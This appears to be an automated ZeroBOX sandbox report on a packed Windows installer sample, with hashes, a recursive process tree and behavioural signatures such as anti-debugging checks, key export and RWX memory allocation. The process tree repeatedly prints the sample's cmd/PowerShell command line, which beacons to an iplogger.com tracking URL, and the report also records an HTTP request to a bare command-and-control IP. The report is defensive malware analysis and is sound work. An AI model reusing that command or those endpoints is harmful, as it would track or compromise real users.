Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 18, 2023, 5:31 p.m.	April 18, 2023, 5:38 p.m.

Size	1.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`7225b0d133ba9c857fbfb6291eab84e3`
SHA256	`9f48cc23f86e01e52df1010eca7cfdf4732960cda26e952512e36f44cfdd0e6d`
CRC32	`48A5BFF5`
ssdeep	`24576:Vz66ywotT8x+3abwDzOd7G8JUl7Qc63nzWI3v+KJnLtWwukluYlYojLOuMPAzMGx:ZBotTHabwWdq17Qc6XzWA+K9tWwWYlY6`
Yara	UPX_Zero - UPX packed file IsPE32 - (no description) PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

Togwcstgxg.exe "C:\Users\test22\AppData\Local\Temp\Togwcstgxg.exe"
1704
- cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
  2124
  - Togwcstgxg.exe "Togwcstgxg.exe"
    2192
    - cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
      2268
      - Togwcstgxg.exe "Togwcstgxg.exe"
        2332
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2524
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2768
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2992
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2348
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2804
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2952
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        1020
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2776
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2848
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2504
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2224
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        2072
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3092
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3388
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3620
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3768
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3932
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3312
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3384
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3904
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        1676
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3672
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        4008
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3320
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2596
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        3936
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        4012
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        1464
        
        cmd.exe "cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        4120
        
        Togwcstgxg.exe "Togwcstgxg.exe"
        4196
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3184
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        4044
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        2444
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3684
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3228
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2060
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3096
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3848
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3172
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3412
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3492
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3760
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3888
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3156
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        3576
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3748
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        368
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        3216
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        2668
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2908
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        1820
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2196
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        2264
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2400
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        2752
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        1688
        
        Yosdofwiqay.exe "Yosdofwiqay.exe"
        2896
        
        powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2080
      - Yosdofwiqay.exe "Yosdofwiqay.exe"
        2404
      - powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
        2552
  - Yosdofwiqay.exe "Yosdofwiqay.exe"
    2628
  - powershell.exe powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
    2736

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
23.95.97.22	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 122 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 18, 2023, 5:32 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (16 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 18, 2023, 5:31 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:31 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:31 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:32 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:33 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:33 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:33 p.m.			0	0
IsDebuggerPresent April 18, 2023, 5:33 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 778 events)

Time & API	Arguments	Status	Return
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a4d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a7d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0048a610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e7b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e7cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e7cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 18, 2023, 5:31 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e7cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\default_apps

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 18, 2023, 5:31 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://23.95.97.22/getid.php?id=jnhmegjcjneklkbcajooihfbfioojjjk

Performs some HTTP requests (1 event)

request

GET http://23.95.97.22/getid.php?id=jnhmegjcjneklkbcajooihfbfioojjjk

Allocates read-write-execute memory (usually to unpack itself) (50 out of 2246 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0256a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02573000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02574000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0256b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 18, 2023, 5:31 p.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
